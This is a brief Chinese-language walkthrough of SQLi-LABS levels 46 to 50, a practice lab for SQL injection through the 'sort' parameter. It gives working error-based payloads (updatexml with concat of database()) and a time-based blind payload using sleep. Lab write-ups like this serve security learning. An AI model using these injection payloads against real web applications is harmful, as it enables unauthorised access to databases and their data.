SQLi-LABS 46关
题目说使用sort参数传参
直接把我们的表整个显示出来了
进行闭合测试
?id=1' //回显错误
?id=1'--+ //回显依旧错误,所以不是字符型单引号
?id=1--+ //回显正常
所以是数字型
尝试联合注入测试回显点
显示union和order by是不正确的,那应该是被过滤了
所以我们这里使用报错注入,因为刚才进行闭合测试时,页面报了语法错误
?sort=1 and updatexml(1,concat(1,database()),1)--+
SQLi-LABS 47关
这一关和46关一样,只是闭合方式变成了单引号闭合
使用报错注入,构造payload
?sort=1' and updatexml(1,concat(1,database()),1)--+
SQLi-LABS 48关
48关依旧是47关的页面,这里也是要求使用sort为参数传参
按照常规的流程流程进行闭合测试
发现是数字型,而且这一关删除了报错信息,所以报错注入就失效了
所以这里可以使用盲注
我们使用时间盲注,构造payload
?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(6),0)--+
SQLi-LABS 49关
49关和48关一样,都没有报错信息,只是49关闭合方式是单引号闭合
继续使用盲注即可
SQLi-LABS 50关
这一关有报错信息,可以使用报错注入
闭合方式是数字型的,依旧使用46关的payload即可
?sort=1 and updatexml(1,concat(1,database()),1)--+